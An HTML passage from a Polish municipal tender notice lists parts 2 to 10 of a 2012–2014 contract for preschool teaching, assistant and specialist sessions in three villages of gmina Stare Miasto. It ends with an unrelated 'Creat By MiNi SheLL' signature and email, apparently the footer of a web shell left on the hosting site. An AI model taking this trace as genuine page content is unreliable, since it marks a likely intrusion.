<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> część nr 2 - obowiązki pomocy nauczyciela w punkcie przedszkolnym w Kazimierowie                   gmina Stare Miasto:.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> zakres zadania:  wsparcie nauczyciela przy realizacji  zajęć opiekuńczych, wychowawczych i dydaktycznych zgodnie  z podstawą programową wychowania przedszkolnego, (dzieci w wieku 3-5 lat - 1 grupa około 15 osobowa) - szczegółowy zakres zadania określony jest we wzorcowej umowie stanowiącej załącznik nr  4.2  do SIWZ 
okres realizacji usługi: od 1 kwietnia 2012 r. do 28 lutego 2014 r. (z wyłączeniem  lipca 2012 r. oraz lipca 2013 r.),  punkt przedszkolny funkcjonujący 25 h tygodniowo,   dodatkowo 1 h dziennie na utrzymanie pomieszczeń w należytym porządku - łącznie 30 h tygodniowo (6 h dziennie).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 28.02.2014.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> część nr 3 - obowiązki nauczyciela-wychowawcy w punkcie przedszkolnym w Ruminie, gmina Stare Miasto:.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> zakres zadania:  realizację zajęć opiekuńczych, wychowawczych i dydaktycznych zgodnie                      z podstawą programową wychowania przedszkolnego, (dzieci w wieku 3-5 lat - 1 grupa około 15 osobowa) - szczegółowy zakres zadania określony jest we wzorcowej umowie stanowiącej załącznik nr  4.1  do SIWZ 
okres realizacji usługi: od 1 kwietnia 2012 r. do 28 lutego 2014 r. (z wyłączeniem  lipca 2012 r. oraz lipca 2013 r.),  punkt przedszkolny funkcjonujący 25 h tygodniowo (5 h dziennie).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 28.02.2014.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> część nr 4 - obowiązki pomocy nauczyciela w punkcie przedszkolnym w Ruminie,                  gmina Stare Miasto:.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> zakres zadania:  wsparcie nauczyciela przy realizacji  zajęć opiekuńczych, wychowawczych i dydaktycznych zgodnie  z podstawą programową wychowania przedszkolnego, (dzieci w wieku 3-5 lat - 1 grupa około 15 osobowa) - szczegółowy zakres zadania określony jest we wzorcowej umowie stanowiącej załącznik nr  4.2  do SIWZ 
okres realizacji usługi: od 1 kwietnia 2012 r. do 28 lutego 2014 r. (z wyłączeniem  lipca 2012 r. oraz lipca 2013 r.),  punkt przedszkolny funkcjonujący 25 h tygodniowo,   dodatkowo 1 h dziennie na utrzymanie pomieszczeń w należytym porządku - łącznie 30 h tygodniowo (6 h dziennie).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 28.02.2014.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> część nr 5 - obowiązki nauczyciela-wychowawcy w punkcie przedszkolnym w Żdzarach , gmina Stare Miasto:.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> zakres zadania:  realizację zajęć opiekuńczych, wychowawczych i dydaktycznych zgodnie                      z podstawą programową wychowania przedszkolnego, (dzieci w wieku 3-5 lat - 1 grupa około 15 osobowa) - szczegółowy zakres zadania określony jest we wzorcowej umowie stanowiącej załącznik nr  4.1  do SIWZ 
okres realizacji usługi: od 1 kwietnia 2012 r. do 28 lutego 2014 r. (z wyłączeniem  lipca 2012 r. oraz lipca 2013 r.),  punkt przedszkolny funkcjonujący 25 h tygodniowo (5 h dziennie).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 28.02.2014.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> część nr 6 - obowiązki pomocy nauczyciela w punkcie przedszkolnym w Żdżarach                  gmina Stare Miasto:.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> zakres zadania:  wsparcie nauczyciela przy realizacji  zajęć opiekuńczych, wychowawczych i dydaktycznych zgodnie  z podstawą programową wychowania przedszkolnego, (dzieci w wieku 3-5 lat - 1 grupa około 15 osobowa) - szczegółowy zakres zadania określony jest we wzorcowej umowie stanowiącej załącznik nr  4.2  do SIWZ 
okres realizacji usługi: od 1 kwietnia 2012 r. do 28 lutego 2014 r. (z wyłączeniem  lipca 2012 r. oraz lipca 2013 r.),  punkt przedszkolny funkcjonujący 25 h tygodniowo,   dodatkowo 1 h dziennie na utrzymanie pomieszczeń w należytym porządku - łącznie 30 h tygodniowo (6 h dziennie).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 28.02.2014.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> część nr 7 - zajęcia gimnastyki korekcyjnej w punktach przedszkolnych w Kazimierowie,  Ruminie,  Żdzarach,  w gminie Stare Miasto:.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> zakres zadania:  prowadzenie zajęć gimnastyki korekcyjnej dla dzieci w wieku 3-5 lat objętych projektem - szczegółowy zakres zadania określony jest we wzorcowej umowie stanowiącej załącznik nr  4.3  do SIWZ 
okres realizacji usługi: od 1 kwietnia 2012 r. do 28 lutego 2014 r. (z wyłączeniem  lipca 2012 r., lipca 2013 r. oraz sierpnia 2013),  
zakres usługi: zajęcia realizowane dla 3 grup przedszkolnych w Kazimierowie, Ruminie oraz Żdżarach, 80 h na grupę (160 spotkań  po 30 minut, 2 razy w tygodniu),  łącznie 240 h zajęć.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 28.02.2014.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> część nr 8 - zajęcia języka angielskiego w punktach przedszkolnych w Kazimierowie,  Ruminie,  Żdzarach,  w gminie Stare Miasto:.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> zakres zadania:  prowadzenie zajęć języka angielskiego dla dzieci w wieku 3-5 lat objętych projektem - szczegółowy zakres zadania określony jest we wzorcowej umowie stanowiącej załącznik nr  4.4  do SIWZ 
okres realizacji usługi: od 1 kwietnia 2012 r. do 28 lutego 2014 r. (z wyłączeniem  lipca 2012 r., lipca 2013 r. oraz sierpnia 2013),  
zakres usługi: zajęcia realizowane dla 3 grup przedszkolnych w Kazimierowie, Ruminie oraz Żdżarach, 80 h na grupę (160 spotkań  po 30 minut, 2 razy w tygodniu),  łącznie 240 h zajęć.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 28.02.2014.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> część nr  9 - zajęcia logopedyczne  w punktach przedszkolnych w Kazimierowie,  Ruminie,  Żdzarach,  w gminie Stare Miasto:.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> zakres zadania:  prowadzenie zajęć logopedycznych dla dzieci w wieku 3-5 lat objętych projektem - szczegółowy zakres zadania określony jest we wzorcowej umowie stanowiącej załącznik nr  4.5  do SIWZ 
okres realizacji usługi: od 1 kwietnia 2012 r. do 28 lutego 2014 r. (z wyłączeniem  lipca 2012 r., lipca 2013 r. oraz sierpnia 2013),  
zakres usługi: zajęcia realizowane dla 3 grup przedszkolnych w Kazimierowie, Ruminie oraz Żdżarach, 40 h na grupę (80 spotkań  po 30 minut, 1 raz w tygodniu),  łącznie 120 h zajęć.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 28.02.2014.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> część nr 10 - zajęcia psychologiczne  w punktach przedszkolnych w Kazimierowie,  Ruminie,  Żdzarach,  w gminie Stare Miasto:.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> zakres zadania:  prowadzenie zajęć psychologicznych  dla dzieci w wieku 3-5 lat objętych projektem - szczegółowy zakres zadania określony jest we wzorcowej umowie stanowiącej załącznik nr  4.6 do SIWZ 
okres realizacji usługi: od 1 kwietnia 2012 r. do 28 lutego 2014 r. (z wyłączeniem  lipca 2012 r., lipca 2013 r. oraz sierpnia 2013),  
zakres usługi: zajęcia realizowane dla 3 grup przedszkolnych w Kazimierowie, Ruminie oraz Żdżarach, 40 h na grupę (80 spotkań  po 30 minut, 1 raz w tygodniu),  łącznie 120 h zajęć.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 28.02.2014.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com